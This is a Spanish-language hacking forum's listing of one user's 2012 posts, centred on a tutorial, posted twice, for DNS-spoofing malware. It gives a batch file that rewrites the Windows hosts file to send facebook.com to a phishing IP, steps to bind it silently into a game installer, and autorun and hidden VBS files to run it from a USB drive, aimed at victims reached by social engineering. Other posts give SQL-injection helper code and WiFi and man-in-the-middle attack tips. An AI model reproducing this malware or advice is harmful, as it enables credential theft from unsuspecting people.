Chicos Veo q el tema se esta desviando por favor Peleas fuera del foro, o me vere Obligado a cerrar el tema.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#262
Hacking ShowOff / XSS Napsix Argentina
Agosto 27, 2012, 06:50:33 PM
Ya que estamos a full con los XSS aporto mi granito de arena.
#263
Java / Encriptador Ascii Java
Agosto 26, 2012, 06:29:37 PM
Aca les traigo una pequeña herramienta, se q no va en esta seccion, pero la hice con la idea de poder, ayudar en las SQLI, en el momento de convertir el nombre de la tabla a Ascii para lograr la Inyeccion. table_name=char()--
Código: JAVA
package codificar;
import javax.swing.JOptionPane;
public class Codificar {
public static void main(String[] args) {
String Texto = JOptionPane.showInputDialog("Ingrese Texto a Encriptar: ");
char Letras[] = new char [Texto.length()];
int Ascii[] = new int [Texto.length()];
for (int i = 0; i < Texto.length(); i++) {
Letras[i] = Texto.charAt(i);
Ascii[i] = (int)Letras[i];
System.out.print(Ascii[i]+ " ,");
}
}
}
#264
Bugs y Exploits / Re:XSS a traves de ERROR
Agosto 26, 2012, 06:11:11 PM
Muy Bueno! Muy Bien explicado!
#265
Hacking / Re:Vulnerando Gnu/Linux con Backtrack 5 y Metasploit
Agosto 23, 2012, 01:31:29 AM
Buen Aporte! esta bueno que se toque el tema de Metasploit por lo q es, desde q salio Armitage muchos se olvidan de las bases
#266
Pentesting / Re:WebCruiser Enterprise V2.6.1 - Scanner de vulnerabilidades para Windows
Agosto 19, 2012, 10:51:16 PM
Buen Aporte!
#267
Wargames y retos / Re:[Solucionario] Reto "Descubre la frase"
Agosto 13, 2012, 04:24:40 PM
Yo lo hice con curl
Código: text
curl -F 'a=a' http://q3rv0.bshellz.net/1fmdI.jpg >> a.jpg #268
Hacking / Re:Dns Spoof Modificando Archivo hosts con "Malware"
Agosto 13, 2012, 02:18:37 AMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Sigue sin funcionar, hizo el ejemplo que dijiste con ip local, pero ni asi funciona, ya lo probe con win 7 y tampoco..
..Saludos espero tu respuesta --->
Fijate luego de modificar el archivo host, en reiniciar la pc y matar el proceso explorer.exe y volverlo a ejecutar
#269
Wargames y retos / Re:[Solucionario] Reto "Descubre la frase"
Agosto 13, 2012, 02:11:49 AM
Jaaa!!! no me pase estaba buscando en el final y pase por alto el principio del hexa! muy bueno!
#270
Hacking / Re:USB Rater Hack (Pendrive USB roba datos)
Agosto 09, 2012, 09:59:55 PM
Buena tool, aunq yo recomiendo un buen RAT con el server FUD y que se ejecute con un autorun!
#271
Dudas y pedidos generales / Re:(Ayuda) Hackear Wifi
Agosto 09, 2012, 01:22:57 PM
No te fies de los programas, no siempre funcionan, entende como funciona, intenta hacerlo a mano y despues codea tu tool o busca algo q se adapte a tus necesidades, los programas q funcionan porq funcionan no siempre funcionan
primero entiende, estudia, domina y luego aplica y vete si quieres para el lado de las tool
primero entiende, estudia, domina y luego aplica y vete si quieres para el lado de las tool
#272
Dudas y pedidos generales / Re:Router
Agosto 08, 2012, 09:21:19 PM
Lee sobre Dns Spoof y Dns Poison ahi bastante materian el el foro usa el buscador
#273
Dudas y pedidos generales / Re:(Ayuda) Hackear Wifi
Agosto 08, 2012, 09:19:42 PM
Primero define q contraseña tiene el Modem/router al q intentas conectarte ya sea WEP WPA WPA2, fijate con la suite Aircrack, espero q tengas una antena con rtl8117l o con algun chipset como atheros q sea soportado por aircrack, si posees todo esto, dependiendo de la encriptacion de la contraseña, el ataque, si es WPA deberas Denegar el Servicio para q el administrador al reconectarce deje colgado el hash
#274
Dudas y pedidos generales / Re:Router
Agosto 08, 2012, 06:49:52 PM
Lo unico q creo posible hacer desde un Router, es cambiar los dns a un proxy y atrapar toda informacion saliente, Man In The Middle, porq para hacer un ataque con metasploit en una red local, no es necesario tener acceso al router (y para un troyano en un uso local tampoco el filtrado de puertos es para la interaccion entre LAN - WAN).
Accediste al Router de tu red Local, o a un Roter de Red Externa???
Accediste al Router de tu red Local, o a un Roter de Red Externa???
#276
Hacking / Re:Dns Spoof Modificando Archivo hosts con "Malware"
Agosto 07, 2012, 09:14:27 PMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginTal ves tu problema radique en esta linea del .bat
Excelente tutorial, lo tratare de hacer haber si me funciona..
No me funciona a la hora de redireccionar,!!!
ya vi el archivo host y la esta cambiado pero no redirecciona, ¿que puede ser?
uso win xp, y firefox i IE
...Saludos --->
echo 190.169.22.51 You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login >> %SystemRoot%\system32\drivers\etc\hosts
el IP debe ser de un Servidor Privado Propio, o uno personal montado con un IP Estatica, si no cuentas con esto, prueba redireccionar a una IP LOCAL
q el archivo localhost quede:
127.0.0.1 You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
esto lograra q al visitar You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login se redireccione a 127.0.0.1
sino otra prueba q puedes hacer es cambiar You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login por el ip de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
hosts:
66.220.149.11 You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
al visitar You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login seras redireccionado a facebook
#277
Hacking / Dns Spoof Modificando Archivo hosts con "Malware"
Agosto 07, 2012, 03:01:11 AM
DNS Spoofing Malware
Bueno en este Tutorial Vamos a ver como realizar un DnsSpoof
atraves del Malware, Modificando el archivo Hosts, y redireccionando
una web a la ip que nosotros deseemos, veremos tambien como ejecutar
este malware desde un una Memoria Flash
El ataque DnsSpoof en el q nos basaremos sera el que modifica el archivo hosts
para eso crearemos un Malware q constara de 2 archivos en un caso y 4 en otro
Primer Caso:
Ingenieria Social.
Crearemos un malware q constara de 2 archivos
un batch q tendra el siguiente codigo (se guardara con la extencion .bat)
Código: text
En mi caso direccionare You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login a un sitio Fake (Phishing)
Código: text
Ahora Uniremos este Archivo con por Ejempo un juego portable de bajo peso,
yo elegi Packman.

Para realizar este proceso utilizaremos iexpress:
(No explicare como Funciona ahi mucha Info en Internet)
Agregamos los 2 Archivos:

aca la parte importante.
Install Program: Pondremos Packman.exe
Post Intall Command: Pondremos DNSSPOOF.bat

En Show Windows ponemos Hidden
En Packege Name and Options marcamos la Opcion Hide file Extracting Progress Animation from User
y lo Guardamos con el Nombre Packman2.exe
En Configure Restart ponemos NO RESTART
Esperamos q Termine la Comprecion
Cambiamos el Icono con ResHacker al q creamos combeniente (en este ejemplo no cambiare el icono)

Ahora ejecutamos para la prueba:

vemos que el juego se ejecuta correctamente, vamos al archivo hosts para ver si funciono.

borramos esta ultima linea porq obviamente nosotros no queremos ser las victimas
Ahora no queda mas q usar algo de Ingenieria Social para q la victima Descarge el Archivo y lo ejecute.
Segundo caso:
Ejecutando Archivo desde un PenDrive:
crearemos un archivo autorun.inf que contenga:
Código: text
y un Start.vbs que contenga:
Código: text
Colocamos DNSSPOOF.bat, Start.vbs, algun .ico q nos guste y el autorun.inf en el PenDrive

Listo Ahora al Conectar el PenDrive Automaticamente se Ejecutara Start.vbs, q a su ves Ejectura DNSSPOOF.bat y cambiara el archivo hosts
Veamos como funciona:
Visitamos You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login luego de ejecutar el Malware en la PC Victima (ya sea por cualquiera de los 2 Casos)
y vemos q nos manda a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (que realmente es un sitio Phishing)
Agregamos de Informacion User: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login pass: Owned

y le damos Entrar, nos redirecciona a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (sitio real de facebook)
vamos a nuestro servidor y revisamos el archivo log.txt

Espero Que Este Tutorial les sea de Ayuda, no me hago responsable por el uso que le puedan dar HD_Breaker
Bueno en este Tutorial Vamos a ver como realizar un DnsSpoof
atraves del Malware, Modificando el archivo Hosts, y redireccionando
una web a la ip que nosotros deseemos, veremos tambien como ejecutar
este malware desde un una Memoria Flash
El ataque DnsSpoof en el q nos basaremos sera el que modifica el archivo hosts
para eso crearemos un Malware q constara de 2 archivos en un caso y 4 en otro
Primer Caso:
Ingenieria Social.
Crearemos un malware q constara de 2 archivos
un batch q tendra el siguiente codigo (se guardara con la extencion .bat)
@echo off
echo "IP a la q sera redireccionado" "Sitio que redireccionaremos" >> %SystemRoot%\System32\drivers\etc\hosts
taskkill /f /IM explorer.exe
explorer.exe
exit
En mi caso direccionare You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login a un sitio Fake (Phishing)
DNSSPOOF.bat:
echo 190.169.22.51 facebook.com >> %SystemRoot%\system32\drivers\etc\hosts
taskkill /f /IM explorer.exe
explorer.exe
exit
Ahora Uniremos este Archivo con por Ejempo un juego portable de bajo peso,
yo elegi Packman.

Para realizar este proceso utilizaremos iexpress:
(No explicare como Funciona ahi mucha Info en Internet)
Agregamos los 2 Archivos:

aca la parte importante.
Install Program: Pondremos Packman.exe
Post Intall Command: Pondremos DNSSPOOF.bat

En Show Windows ponemos Hidden
En Packege Name and Options marcamos la Opcion Hide file Extracting Progress Animation from User
y lo Guardamos con el Nombre Packman2.exe
En Configure Restart ponemos NO RESTART
Esperamos q Termine la Comprecion
Cambiamos el Icono con ResHacker al q creamos combeniente (en este ejemplo no cambiare el icono)

Ahora ejecutamos para la prueba:

vemos que el juego se ejecuta correctamente, vamos al archivo hosts para ver si funciono.

borramos esta ultima linea porq obviamente nosotros no queremos ser las victimas

Ahora no queda mas q usar algo de Ingenieria Social para q la victima Descarge el Archivo y lo ejecute.
Segundo caso:
Ejecutando Archivo desde un PenDrive:
crearemos un archivo autorun.inf que contenga:
[autorun]
action=Open Files On Folder
icon=USB.ico
shellexecute=Start.vbs
y un Start.vbs que contenga:
set objshell = createobject("wscript.shell")
objshell.run "DNSSPOOF.bat",vbhide
Colocamos DNSSPOOF.bat, Start.vbs, algun .ico q nos guste y el autorun.inf en el PenDrive

Listo Ahora al Conectar el PenDrive Automaticamente se Ejecutara Start.vbs, q a su ves Ejectura DNSSPOOF.bat y cambiara el archivo hosts
Veamos como funciona:
Visitamos You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login luego de ejecutar el Malware en la PC Victima (ya sea por cualquiera de los 2 Casos)
y vemos q nos manda a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (que realmente es un sitio Phishing)
Agregamos de Informacion User: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login pass: Owned

y le damos Entrar, nos redirecciona a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (sitio real de facebook)
vamos a nuestro servidor y revisamos el archivo log.txt

Espero Que Este Tutorial les sea de Ayuda, no me hago responsable por el uso que le puedan dar HD_Breaker
#278
Dudas y pedidos generales / Re:analizar host fuera de red
Agosto 03, 2012, 12:19:37 AM
Usa NMAP y la ip publica, o host de la pc, si esta filtrado es porq por mas q este abierto el puerto existe un firewall "viendo" que pasa por el
#279
Bugs y Exploits / Re:Mysql injection avanzada: "doble query/error based"
Agosto 02, 2012, 10:07:18 PM
Muy buen aporte! Gracias!
#280
Hacking / Re:Realizando un ataque man in the middle (hombre en el medio) by arthusu
Agosto 01, 2012, 06:41:39 PM
Buen Aporte sigue así!

